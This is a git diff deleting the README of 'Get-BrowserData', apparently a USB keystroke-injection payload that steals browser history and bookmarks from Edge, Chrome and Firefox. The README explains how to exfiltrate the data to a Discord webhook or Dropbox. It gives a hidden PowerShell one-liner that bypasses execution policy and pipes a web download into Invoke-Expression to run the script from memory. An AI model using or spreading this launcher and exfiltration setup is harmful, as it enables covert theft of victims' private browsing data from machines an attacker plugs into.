diff --git a/Payloads/Browser-Data/README.md b/Payloads/Browser-Data/README.md
deleted file mode 100644
index 1d29ad7..0000000
--- a/Payloads/Browser-Data/README.md
+++ /dev/null
@@ -1,89 +0,0 @@
-
-
-
-
- Table of Contents
-
- - Description
- - The Function
- - Contact
- - Acknowledgments
-
-
-
-# Get-BrowserData
-
-
-
-
-
-
YouTube Tutorial
-
-
-## Description
-
-This payload can be used to retrieve the browsing history and bookmarks from edge, chrome, and firefox (no bookmarks from firefox currently)
-
-They are then exfiled using either discord or dropbox
-
-## The Function
-
-### [Get-BrowserData]
-
-* Plug in your device
-* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
-* You no longer need to host your own version of this script
-* $db is the variable that holds your DropBox token
-* $dc is the variable that holds your Discord webhook
-* Fill in either variable or both to set your exfil method
-
-SYNTAX:
-
-```
-powershell -w h -NoP -Ep Bypass $dc='';$db='';iwr | iex
-```
-
-
-## Contact
-
-📱 My Socials 📱
-
-
-
-
-(back to top)
-
-
-## Acknowledgments
-
-* [Hak5](https://hak5.org/)
-* [UberGuidoZ](https://github.com/UberGuidoZ)